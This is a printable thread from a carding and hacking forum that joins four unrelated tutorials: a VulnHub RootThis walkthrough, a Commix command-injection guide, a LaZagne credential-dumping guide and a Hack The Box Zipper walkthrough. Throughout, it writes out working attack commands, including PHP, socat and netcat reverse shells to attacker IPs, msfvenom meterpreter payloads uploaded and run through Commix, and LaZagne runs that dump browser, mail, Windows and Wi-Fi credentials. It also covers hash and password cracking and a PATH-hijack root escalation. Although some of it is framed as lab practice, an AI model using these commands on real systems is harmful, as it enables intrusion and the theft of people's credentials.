[Guide] How to Vulnhub: RootThis: 1 Walkthrough

[Guide] How to Vulnhub: RootThis: 1 Walkthrough - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Vulnhub: RootThis: 1 Walkthrough (/Thread-Guide-How-to-Vulnhub-RootThis-1-Walkthrough)

[Guide] How to Vulnhub: RootThis: 1 Walkthrough - NINZA - 05-14-2020

Hello friends! Today we are going to take another boot2root challenge known as root this. The credit for making this VM machine goes to “Fred Wemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM

[To see content please register here]

.
Security Level: Intermediate
Flags: There is one flag (flag.txt).
Penetrating Methodology:

IP Discovery using netdiscover
Network scanning (Nmap)
Surfing HTTP service port (80)
Directory enumeration using dirb
Getting Backup file using wget
Cracking password using fcrackzip
Cracking Hashes using John the Ripper
Getting Reverse Shell
Getting a proper TTY shell using socat
Cracking root password using sucrack
Retrieving flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target –> 192.168.1.135
Our next step is to scan our target with nmap.
nmap -p- -A 192.168.1.135
1
nmap -p- -A 192.168.1.135
[Image: 2.png?w=687&ssl=1]

The NMAP output shows us that there is only 1 port open: 80(HTTP)
We find that port 80 is running http, so we open the IP in our browser.
[Image: 3.png?w=687&ssl=1]

We don’t find anything on the webpage, so we use dirb to enumerate the directories on the web server.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

We find two interesting directories called “backup” and “drupal”. We open the “/drupal” directory and find a Drupal CMS login page. We are unable to login or find any vulnerability on the CMS.
[Image: 5.png?w=687&ssl=1]

We try to open the “backup/” directory and find that it is a file. So we use “wget” to download the file on our system. After downloading the file, we find that is a ZIP file. When we tried to extract it we are prompted for a password. To brute force, the password protected file we can use a tool called “fcrackzip”. After getting the password for the ZIP file we extract the data and find a SQL file.
wget

[To see content please register here]

file backup
frackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup
unzip backup
cat dump.sql
1
2
3
4
5
wget

[To see content please register here]

file backup
frackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup
unzip backup
cat dump.sql
[Image: 6.png?w=687&ssl=1]

Searching through the content of the SQL file, we find 2 usernames and their password hashes.
[Image: 7.png?w=687&ssl=1]

We save the hashes in a file and then use john the ripper to crack the hashes. We are successfully able to crack the hash and get the password for the user “webman”.
john hashes --wordlist=/usr/share/wordlists/rockyou.txt
1
john hashes --wordlist=/usr/share/wordlists/rockyou.txt
[Image: 8.png?w=687&ssl=1]

We use the credentials “webman: moranguita” to login through Drupal CMS and are successfully able to login.
[Image: 9.png?w=687&ssl=1]

To get a reverse shell of the target system, we go to add content and add the following php code to get a revere shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.107/1234 0>&1'");
1
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.107/1234 0>&1'");
[Image: 11.png?w=687&ssl=1]

We set up our listener and as soon as we click on save on the CMS we get a reverse shell. Enumerating the target system; inside “/home/user” directory we find a file called “MessageToRoot.txt”. We open the file and find it has hinted that the root password is inside the first 300 words of the rockyou.txt. We try to “su” command and find that we don’t have a proper TTY shell to run the command.
[Image: 12.png?w=687&ssl=1]

We tried multiple ways to get a TTY shell, but are unable to spawn one with an available application on the target machine. So we upload socat on the target machine to get a TTY shell. (Download socat from

[To see content please register here]

)
wget

[To see content please register here]

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.107:4567
1
2
wget

[To see content please register here]

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.107:4567
[Image: 13.png?w=687&ssl=1]

We start a listener on our local system and are able to get a reverse shell. We run “su” command and find that we are able to spawn a TTY shell.
[Image: 14.png?w=687&ssl=1]

Now we create a dictionary with the first 300 words of rockyou.txt.
head -n 300 /usr/share/wordlists/rockyou.txt > dict.txt
1
head -n 300 /usr/share/wordlists/rockyou.txt > dict.txt
[Image: 15.1.png?w=687&ssl=1]

Now as there is SSH running on the target machine, we cannot brute force the username and password. Instead, we can use a tool called “sucrack” that brute forces password locally through “su”. We download it in our system and extract it. Then we compile the application on our system as it is not C-compiler on the target machine. After compiling the application, we archive the compiled application to upload it on the target machine. (You can find more information about sucrack and download sucrack from

[To see content please register here]

)
tar -xvf sucrack-1.2.3.tar.gz
cd sucrack-1.2.3/
./configure
make
tar -cvf sucrack.tar sucrack-1.2.3/
1
2
3
4
5
tar -xvf sucrack-1.2.3.tar.gz
cd sucrack-1.2.3/
./configure
make
tar -cvf sucrack.tar sucrack-1.2.3/
[Image: 15.png?w=687&ssl=1]

We upload the dictionary file and the compiled application on the target system. We first start our python HTTP server using “SimpleHTTPServer” module and then use “wget” command on the target machine to download it from our local system. After downloading both the files we extracted the tar file.
wget

[To see content please register here]

tar xvf sucrack.tar
1
2
wget

[To see content please register here]

tar xvf sucrack.tar
[Image: 16.png?w=687&ssl=1]

After extracting the tar file, we go to “sucrack1-2.3/src” directory as the compiled application is inside this directory and run the command to brute force the password. The application was successfully able to brute force the password for root user. We switched to root user and inside /root directory and we successfully able to get the flag.
./sucrack -u root -w 10 /tmp/dict.txt
1
./sucrack -u root -w 10 /tmp/dict.txt
[Image: 17.png?w=687&ssl=1]

In this article, we learn how to use Commix from scratch by using all the basic commands and going all the way to the advanced ones.
Table of Content

Introduction to command injection
Introduction to Commix
Working of Commix
Types of Commix
Requirements

Introduction to Command Injection
Command injection is also known as shell injection or OS injection. Command injection is one of the top 10 OWASP vulnerability. it’s an attack in which arbitrary commands of a host OS are executed through a vulnerable application. Such an attack is possible when a web application sends unsafe user data to the system shell. This user data can be in any form such as forms, cookies, HTTP headers, etc. Mostly the vulnerability command injection rises due to insufficient input validation. In this attack, the default functionality of the application is extended by an attacker who then executed the system commands with injecting code which makes it different from code injection.
The process of command injection was accidentally discovered in 1997 by a programmer in Norway. This accident led to the deletion of web pages of a site. SQL command injection is the most popular form of command injection. Through this attack, an attacker adds SQL code to the input box in order to gain access. Web applications are compulsory for such attacks as we communicate with the underlying OS via such web applications.
Introduction to Commix
Commix tool is automated for exploiting the vulnerability of command injection in web applications. This tool is written in python which means it is compatible with Linux, windows and mac. It comes pre-installed in Kali Linux, BlackArch and Parrot OS. This tool makes it very easy to find vulnerabilities related to command injection and then further exploit them. The user-friendliness of commix makes it very convenient for everyone, such as web developers, pen testers or security researchers, to use it.
It provides a user with a lot of options such as including the ability to specify parameters that you need to connect to host, enumeration of a victim, accessing files and their modification along with an offline mode. Hence, it’s a pretty useful asset in order to exploit command injection vulnerability.
Working of Commix
Commix has various command options which you can use to find and connect with the target application. Few of the options target URL is via data strings, HTTP headers, cookies and authentication parameters. There are various enumerations options present too. Commix supports two command injection techniques i.e. result-based command injection technique and blind command injection technique. Result based command injection is the once where commands are reflected back to the attacker in the web application. Whereas blind command injection technique is persuading when the response is not reflected on a web application.
Types of Command Injection in Commix
Result based command injection
This type of injection attack will let you deduce the result of the injected command through the result of a web application. It is further divided into two categories :

Classic result based injection : This is the most commonly used type of command injection and is the simplest of all. In this, several common operators are used which either links genuine commands with the injected ones or exclude the initial commands altogether and goes ahead to execute the injected ones only. this further divides into 3 categories i.e. Shellshock, ICMP exfiltration, DNS exfiltration.
Eval-Based technique : This technique is used where the targeted web application is vulnerable to eval() function. This eval function is used to execute the peculiar code that is defined in the said function during run time.

Blind Command Injection
The way that the data is retrieved after the execution of injected shell command is the main difference between the working of both the types. In the case where web application does not give any result back to the attacker; blind command injection is used. There are further two types of blind command injection :

Time-based Technique : Using this technique will delay the time of the execution of a command that is injected. By checking how much time the application took to revert will able the attacker to determine whether the command is executed successfully or not.
File-based Technique : If you are not able to determine the result of the web application through its reaction, then this technique comes in handy as it will allow you to write the set of commands that are to be injected in the file accessible to the attacker. Working of this technique is similar to that of result based technique.

Requirements

DVWA
PentestLab
Kali Linux
Commix Tool

Some of the practical we will do in pentestlab for Linux and others we will perform on DVWA for windows. Let’s start with the practical of commix. First, we will use help command to check all the options that we use to exploit target via commix.
commix –h
1
commix –h
[Image: 1.png?w=687&ssl=1]

Now let’s try and get a commix session using the URL. For this, use the URL that is vulnerable to the command injection, here, we will pentesterlab’s URL as shown in the image below :
[Image: 2.png?w=687&ssl=1]

Use the following command to have a commix session through URL :
commix -u <URL>
1
commix -u <URL>
And so, with this command you get a commix(os_shell) as shown in the image below :
[Image: 3.png?w=687&ssl=1]

Now, let’s use the batch command to have the commix session by default and for this use the following command :
commix -u <URL> --batch
1
commix -u <URL> --batch
[Image: 4.png?w=687&ssl=1]

Now, as you can see in the above image, we have directly entered the session by default. Now, to get all the basic information about the target use the following command :
commix -u <URL> --all
1
commix -u <URL> --all
[Image: 5.png?w=687&ssl=1]

As shown in the image above, using the above command will give you all the basic information about the target. Next, with the help of the following command we can know the current user of target :
commix –u <URL> --current-user
1
commix –u <URL> --current-user
[Image: 6.png?w=687&ssl=1]

As a result of the above command, you can see in the above that the current user is www-data. Now, we can also find out the hostname by using the following command :
commix –u <URL> --hostname
1
commix –u <URL> --hostname
[Image: 7.png?w=687&ssl=1]

Hence, the host is Debian. Now, the question is how we can determine whether the out target is rooted or not. So, for this, we have the following command :
commix –u <URL> --is-root
1
commix –u <URL> --is-root
[Image: 8.png?w=687&ssl=1]

This way we found that our target was not rooted. Use the following command to have the information about the system :
commix –u <URL> --sys-info
1
commix –u <URL> --sys-info
[Image: 9.png?w=687&ssl=1]

Upon executing the above command, we now have the system information. To have information about users, use the following command :
commix –u <URL> --users
1
commix –u <URL> --users
[Image: 11.png?w=687&ssl=1]

And this way, we have a list of all the users. Next command is used to know about the admin of the system :
commix –u <URL> --is-admin
1
commix –u <URL> --is-admin
[Image: 12.png?w=687&ssl=1]

And again you can see that the target is not the admin. Now to read the contents of a desired file, we can use the following command :
commix –u <URL> --file-read=/etc/passwd
1
commix –u <URL> --file-read=/etc/passwd
[Image: 13.png?w=687&ssl=1]

And the results of the above command are shown in the image above. Our next practicals are performed on DWVA (windows environment)
[Image: 14.png?w=687&ssl=1]

Captured the cookies of the submitted request using BurpSuite.
[Image: 15.png?w=687&ssl=1]

Now, we use this content of cookie to validate our session using the parameters ‘—cookie’ and ‘—data’. These two parameters are used to send data string in order to exploit the POST method and to validate our session simultaneously. For this, use the following command :
commix –u <URL> --cookie="security=low; PHPSESSID=2r9avccki91i3uq2eqlud8sg08" --data="ip=127.0.0.1&Submit=Submit"
1
commix –u <URL> --cookie="security=low; PHPSESSID=2r9avccki91i3uq2eqlud8sg08" --data="ip=127.0.0.1&Submit=Submit"
[Image: 16.png?w=687&ssl=1]

With the help of above the command, we will directly have a session as shown in the image above. Now, we will create a malware file using msfvenom. Type the following command to generate your malware :
msfvenom –p python/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1234 –f raw > venom.py
1
msfvenom –p python/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1234 –f raw > venom.py
[Image: 18.png?w=687&ssl=1]

Now, we will use the above file and upload it in our target by using the following command :
commix -u <URL> --cookie="PHPSESSID=4029asg19ejeuibfq30d7lc1o8; security=low" --data="ip=127.0.0.1&Submit=Submit" --file-write="/root/venom.py" --file-dest="/tmp/venom.py" --os-cmd="python /tmp/venom.py"
1
commix -u <URL> --cookie="PHPSESSID=4029asg19ejeuibfq30d7lc1o8; security=low" --data="ip=127.0.0.1&Submit=Submit" --file-write="/root/venom.py" --file-dest="/tmp/venom.py" --os-cmd="python /tmp/venom.py"
[Image: 19.png?w=687&ssl=1]

Now, the above command will upload and run our malware in the target machine. You can use multi/handler to get a session and for this use the following set of commands :
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost eth0
set lport 1234
run
1
2
3
4
5
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost eth0
set lport 1234
run
[Image: 20.png?w=687&ssl=1]

And this way, as shown in the image, you will have a meterpreter session. This is how you can use commix, a third party automated tool, to your advantage.

This article will be focused on The LaZagne project and its usage in Post Exploitation.
Table of Content:

Introduction of LaZagne Project
Syntax and Parameters
Achieve Meterpreter and Upload LaZagne
Help Screen
Mails Argument
Windows Argument
Browsers Argument
Databases Argument
Wi-Fi Argument
All Argument
oN Parameter
Verbose Mode Parameter
Quiet Parameter

Introduction of LaZagne Project
The LaZagne is an open source application. It retrieves stored passwords on a System. It directly injects the Python code in the memory without writing anything on disk. This makes it difficult to trace. Usually, when we get a session on a target system, our main aim is to gather credentials. When an attacker attacks a target, there are two ways through it can compromise the target. If the attacker gets the meterpreter session, then all it does is compromise the device security.
But using some scripts and post exploitation modules, the target can compromise every nook of security of the victim. This includes Email Passwords, Social Networking Passwords, SSH Passwords, Banking Information, etc. Usually, this extracting of passwords is a noisy and clumsy task but with LaZagne it is very simple and stealthy.
Without LaZagne, Attackers normally run a bunch of different scripts targeting different applications that are installed on the Target System. But LaZagne does this automatically, it first checks which application is installed on the target system and then it runs that specific script targeting the password for that particular application.
Famous Scripts Included in LaZagne

KeeThief
mimipy
mimikatz
pypykatz
creddump
chainbreaker
pyaes
pyDes
secretstorage and many more.

Target Software

Firefox
Google Chrome
Opera
Skype
Postgresql
Thunderbird
Keepass
CoreFTP
FileZilla and many more.

Syntax and Parameters
On Linux Systems, LaZagne will be executed as a Python file. But when out target is Windows then we will have to use executable(exe) file. We can download more executables from

[To see content please register here]

LaZagne has a lot of other parameters and conditions, but here we have used only certain parameters and targets due to technological limitations.
Achieve Meterpreter and Upload LaZagne
Open Kali Linux terminal and type msfconsole in order to load Metasploit framework. Now we need to compromise victim’s machine one to achieve any type of session either meterpreter or shell and to do so we can read our previous article from

[To see content please register here]

.
After getting meterpreter on the remote system, we need to upload the executable file to the target machine to extract credentials. We will use upload command for this.
upload lazagne.exe .
1
upload lazagne.exe .
[Image: 1.png?w=687&ssl=1]

Now that we have the LaZagne on the target system, it’s time to enumerate passwords.
Use shell command on the meterpreter shell to get to the command line on the target system.
Help Screen
To get details about the LaZagne we will use the -h parameter. This will print the list of parameters and arguments with the working examples on our screen. This is an informative banner as it not only gives us various methods that we can use but it also tells us how to use those parameters.
lazagne.exe -h
1
lazagne.exe -h
[Image: 2.png?w=687&ssl=1]

Mails Argument
This argument targets mail clients like Mozilla Thunderbird and Microsoft Outlook. When this argument is selected, a script runs in the background which extracts the Login Credentials that are stored by these email clients. As we can see in the given image that it has successfully extracted the credentials that were stored in the Email Clients.
lazagne.exe mails
1
lazagne.exe mails
[Image: 3.png?w=687&ssl=1]

Windows Argument
This argument targets Windows Security on all fronts. When this argument is selected, a script runs in the background which includes autologon, cachedump, credman, hashdump, lsa_secrets, and others. This compromises all of the Windows defenses and gives the attacker the credentials, he is craving for. As we can see in the given image that it has successfully extracted the credentials.
lazagne.exe windows
1
lazagne.exe windows
[Image: 4.png?w=687&ssl=1]

Browsers Argument
This argument targets Browsers like Mozilla Firefox, Google Chrome, Opera, UC Browser, Microsoft Edge and much more. When this argument is selected, a script runs in the background which extracts the Login Credentials that are stored inside the browsers. Browsers hide the passwords and show them only after verifying the windows credentials. So, in order to extract the Credentials stored inside the browser, LaZagne attacks the SAM and gets the Windows password and then use it to extract the rest passwords. As we can see in the given image that it has successfully extracted the credentials that were stored in Firefox and Chrome.
lazagne.exe browsers
1
lazagne.exe browsers
[Image: 5.png?w=687&ssl=1]

Databases Argument
This argument targets database clients like Postgresql. When this argument is selected, a script runs in the background which extracts the Login Credentials that are stored by any database client. As we can see in the given image that it has successfully extracted the credentials that were stored in the Postgresql Client.
lazagne.exe databases
1
lazagne.exe databases
[Image: 6.png?w=687&ssl=1]

Wi-Fi Argument
This argument targets the stored Wi-Fi Credentials. When this argument is selected, a script runs in the background which extracts the Wi-Fi Credentials. All the Wi-Fi Network that the user had connected and opted for saving the password. As we can see in the given image that it has successfully extracted the Wi-Fi credentials.
lazagne.exe wifi
1
lazagne.exe wifi
[Image: 7.png?w=687&ssl=1]

All Argument
This argument runs all the module in the LaZagne. When this argument is selected, a script runs in the background which extracts all the Login Credentials that are stored on the Target System. As we can see in the given image that it has successfully extracted all the possible credentials from the target.
lazagne.exe all
1
lazagne.exe all
[Image: 8.png?w=687&ssl=1]

oN Parameter
This parameter should be run with some argument otherwise, it will give an error (We are using all argument here). This parameter is optional to run. This parameter not only prints the output on the terminal screen but also creates a file in the Directory it was run and writes it with the output of the Script.
lazagne.exe all -oN
1
lazagne.exe all -oN
[Image: 9.png?w=687&ssl=1]

Let’s check if the file was created. As we can see in the given image that a file named credentials is created and on opening it using the cat command it shows the same result that we saw on the terminal.
[Image: 10.png?w=687&ssl=1]

Verbose Mode Parameter
This parameter should be run with some argument otherwise, it will give an error (We are using all argument here). This parameter is optional to run. In LaZagne by default, we have 2 levels of verbosity. They are Level 0 and Level 1. If no parameter is given Level 0 is selected automatically. But when we give –vv parameter, it increases the verbosity of the extraction. The output also changes. Now LaZagne forcefully runs each and every script in its arsenal and try to extract more and more credentials.
lazagne.exe all -vv
1
lazagne.exe all -vv
[Image: 11.png?w=687&ssl=1]

Quiet Parameter
This parameter should be run with some argument otherwise, it will give an error (We are using all argument here). This parameter is optional to run. This parameter doesn’t print any output on the terminal screen. Scripts do run in the background but there is no visibility of the passwords extracted so we use the parameter with the oN parameter we discussed earlier as it creates a file in the Directory it was run and writes it with the output of the Script.
lazagne.exe all -quiet -oN
1
lazagne.exe all -quiet -oN
[Image: 12.png?w=687&ssl=1]

Today we are going to solve another CTF challenge “Zipper”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Hard
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Zipper is 10.10.10.108
Penetrating Methodology

Network scanning (Nmap)
Surfing HTTPS service port (80)
Directory enumeration using gobuster
Logging in as a Guest User
Enumerating for Login Credentials
Logging in through zabbix–cli
Giving permissions to access GUI
Getting a reverse shell using zabbix exploit
Retrieving User flag
Modify the Environment PATH to run systemctl
Snagging the Root Flag

Walkthrough
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -A 10.10.10.108
1
nmap -A 10.10.10.108
[Image: 1.png?w=687&ssl=1]

The Nmap scan shows us that there are 2 ports open: 22(SSH), 80(HTTP)
As port is 80 is running HTTP service, we access the web service using the web browser.
[Image: 2.png?w=687&ssl=1]

Now we run gobuster to enumerate the directories of the web service and find a directory called /zabbix.
gobuster -s '200,204,301,302,307,403,500' -e -t 20 -u

[To see content please register here]

-w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
1
gobuster -s '200,204,301,302,307,403,500' -e -t 20 -u

[To see content please register here]

-w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[Image: 3.png?w=687&ssl=1]

We open the “zabbix” directory and find a login page for Zabbix web portal.
[Image: 4.png?w=687&ssl=1]

Now we login as guest and are able to access the dashboard.
[Image: 5.png?w=687&ssl=1]

Enumerating the web application, inside “Latest data” in monitoring data we get a hint for the username as “Zapper’s Backup script”.
[Image: 6.png?w=687&ssl=1]

Now we try to login again as user “zapper”. We try to login using the username and password the same i.e. “zapper: zapper”.
[Image: 7.png?w=687&ssl=1]

When we try to login, we get an error stating the “GUI access disabled”.
[Image: 8.png?w=687&ssl=1]

As we do not have GUI access, we use zabbix-cli to connect the zabbix api and we check the available users. Now we can either create a user with GUI access or add an existing user to a group with GUI. In this case, we first create a new group called hack with GUI access enabled.
zabbix-cli
show_users
create_usergroup
1
2
3
zabbix-cli
show_users
create_usergroup
[Image: 10.png?w=687&ssl=1]

Now add user “zapper” to the new group we created and we remove the user “zapper” from the previous group called “No access to the frontend”.
add_user_to_usergroup
remove_user_from_usergroup
show_users
1
2
3
add_user_to_usergroup
remove_user_from_usergroup
show_users
[Image: 11.png?w=687&ssl=1]

Now we are successfully able to access the web portal as user “zapper”.
[Image: 15.png?w=687&ssl=1]

Searching for an exploit for Zabbix application, we find an exploit

[To see content please register here]

. It requires username, password, and hostid to run the exploit successfully. As we have access to the dashboard, we can find the hostid of a container.
[Image: 16.png?w=687&ssl=1]

Now we edit the exploit according to the target application.
[Image: 17.png?w=687&ssl=1]

We run the exploit and are able to get a shell. Now to get a reverse shell we setup our listener using netcat and run the bash one liner to get a reverse shell.
python exploit.py
whoami
rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 > /tmp/f
1
2
3
python exploit.py
whoami
rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 > /tmp/f
[Image: 18.png?w=687&ssl=1]

Now when we check our listener, we find that we are successfully able to get a reverse shell. When we try to spawn a TTY shell using python, we find that the system doesn’t contain either python or python3. So we use start to bash interactive shell.
python -c "import pty;pty.spawn('/bin/bash')"
which python
which python3
bash -i
1
2
3
4
python -c "import pty;pty.spawn('/bin/bash')"
which python
which python3
bash -i
[Image: 19.png?w=687&ssl=1]

Enumerating the system, we find that we are inside a Docker container. We are able to find any solution to escape the container. If we take a look at the zabbix documentation page, we find there is an option called “execute_on”. To execute inside the container, we have to set this option as “0” and to execute on the server we have the to set this option as “1”. We edit the exploit and add these options in our exploit to get the reverse shell of the server.
[Image: 21.png?w=687&ssl=1]

We now run the exploit and use bash one liner to get a reverse shell.
python exploit.py
whoami
rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 > /tmp/f
1
2
3
python exploit.py
whoami
rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 > /tmp/f
[Image: 22.png?w=687&ssl=1]

We setup the listener and get a reverse shell on the server.
[Image: 25.png?w=687&ssl=1]

We change the directory to “/home/zapper” and find a file called “user.txt”. We try to open the file and find that we do not have read permissions.
[Image: 26.png?w=687&ssl=1]

We now go to the “utils” directory and find a file called “backup.sh”. We open the file called find the password for user “zapper”.
[Image: 27.png?w=687&ssl=1]

We switch user to zapper and use the password we find inside the “backup.sh” file. After we switch user, we again try to open the “user.txt” file and find the first flag.
[Image: 29.png?w=687&ssl=1]

We also find a file called “zabbix-service” with SUID bit set. We find that the program is executing “systemctl” when we check the program with strings.
[Image: 30.png?w=687&ssl=1]

Now we can modify the PATH environment variable so that the program can run our malicious “systemctl”. We create a new systemctl file that executes /bin/bash and gives it executable permission. Then we change the PATH environment variable to the location in which our malicious file is stored and run the application. As soon as we run the program we get a root shell.
echo "/bin/bash" > systemctl
chmod +x systemctl
PATH=~/:$PATH
utils/zabbix-service
1
2
3
4
echo "/bin/bash" > systemctl
chmod +x systemctl
PATH=~/:$PATH
utils/zabbix-service
[Image: 31.png?w=687&ssl=1]

Now we change to /root directory and find a file called “root.txt”. We take a look at the content of the file and find our final flag.
[Image: 32.png?w=687&ssl=1]